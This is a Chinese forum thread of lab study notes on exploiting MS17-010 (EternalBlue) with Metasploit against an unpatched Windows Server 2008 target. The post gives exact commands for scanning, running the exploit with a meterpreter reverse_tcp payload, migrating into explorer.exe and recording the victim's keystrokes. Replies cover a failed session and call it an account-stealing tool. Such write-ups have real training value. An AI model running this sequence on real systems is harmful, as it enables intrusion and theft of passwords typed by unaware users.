吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 3501|回复: 11
收起左侧

[学习记录] 学习笔记 kali linux 关于MS17-101漏洞攻击与键盘记录

[复制链接]
yangheng48 发表于 2020-7-11 15:44
环境:        攻击机:192.168.200.101   //kali Linux 2020
                靶机:192.168.200.103    (未打MS17-010补丁windowsServices2008.x64)

1:msfconsole                                                                         //进入metaploit

2:nmap -sV 192.168.200.103(检查445端口是否开放)        //使用nmap探测主机信息

3:利用msf的auxiliary模块进行漏洞验证
search ms17-010                                                                         //查询MS17-010永恒之蓝漏洞信息
use  auxiliary/scanner/smb/smb_ms17_010                                 //使用辅助扫描smb,是否存在永恒之蓝漏洞
set  rhost  192.168.200.103                                                         //设置目标IP                                       
set  rport   445                                                                         //设置目标端口
run                                                                                                 //开始扫描

4:设置攻击目标、端口、本机
use  exploit/windows/smb/ms17_010_eternalblue                      //利用永恒之蓝漏洞
set  rhost  192.168.200.103                                                      //设置目标IP
set  rport   445                                                                     //设置目标端口
set lhost 192.168.200.101                                                     //设置kali linux IP地址
set  payload   windows/x64/meterpreter/reverse_tcp             //使用reverse_tcp攻击荷载
show options                                                                             //查看是否设置完成
run                                                                                             //开始攻击

若成功则拿到目标机的shell

6:输入ps查看进程

#找到explorer.exe进程(记住PID)
PID   PPID  Name               Arch  Session  User                          Path
---   ----  ----               ----  -------  ----                          ----
1996  1980  explorer.exe       x86   0        VIOLET\violetevergarden       C:\WINDOWS\Explorer.EXE

7:meterpreter > migrate 1996                                         //迁移会话

8:run post/windows/capture/keylog_recorder                //进行键盘记录

#键盘记录完成后会生成一个文件,文件路径会在攻击完成后显示,注意,键盘记录需要按ctel+c结束。
————有些小伙伴可能在拿到shell后可能会有乱码这里给予解决方法:输入命令:chcp 65001 即可

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

hack528 发表于 2020-7-11 15:58
学好XXX 牢饭吃到饱
小白1只吖 发表于 2020-7-11 16:00
ciker_li 发表于 2020-7-11 16:19
辉夜年华 发表于 2020-7-11 16:29
exploit completed, but no session was created
 楼主| yangheng48 发表于 2020-7-11 18:14
刚开始使用的时候,的确会碰到这种情况(我碰到无数次了都。。)加油!不是所有的笔记都是对的,只是起到抛砖引玉的作用,要自己思考和拿捏!只有自己思考出来的才会是自己的!学渗透不是一朝一夕的事,要慢慢来。我就是想说今天失败了不代表明天失败,有句英语说的好Rome,is not bulit in one day
白纸樱法 发表于 2020-8-28 18:36
辉夜年华 发表于 2020-7-11 16:29
exploit completed, but no session was created

大概是你这个靶机没有这个漏洞吧
辉夜年华 发表于 2020-8-31 11:18
白纸樱法 发表于 2020-8-28 18:36
大概是你这个靶机没有这个漏洞吧

扫出来的有嘞
c03xp 发表于 2020-8-31 11:24
盗号利器
头像被屏蔽
灰度X 发表于 2020-12-4 18:00
提示: 作者被禁止或删除 内容自动屏蔽
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止回复与主题无关非技术内容,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-5-11 01:17

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表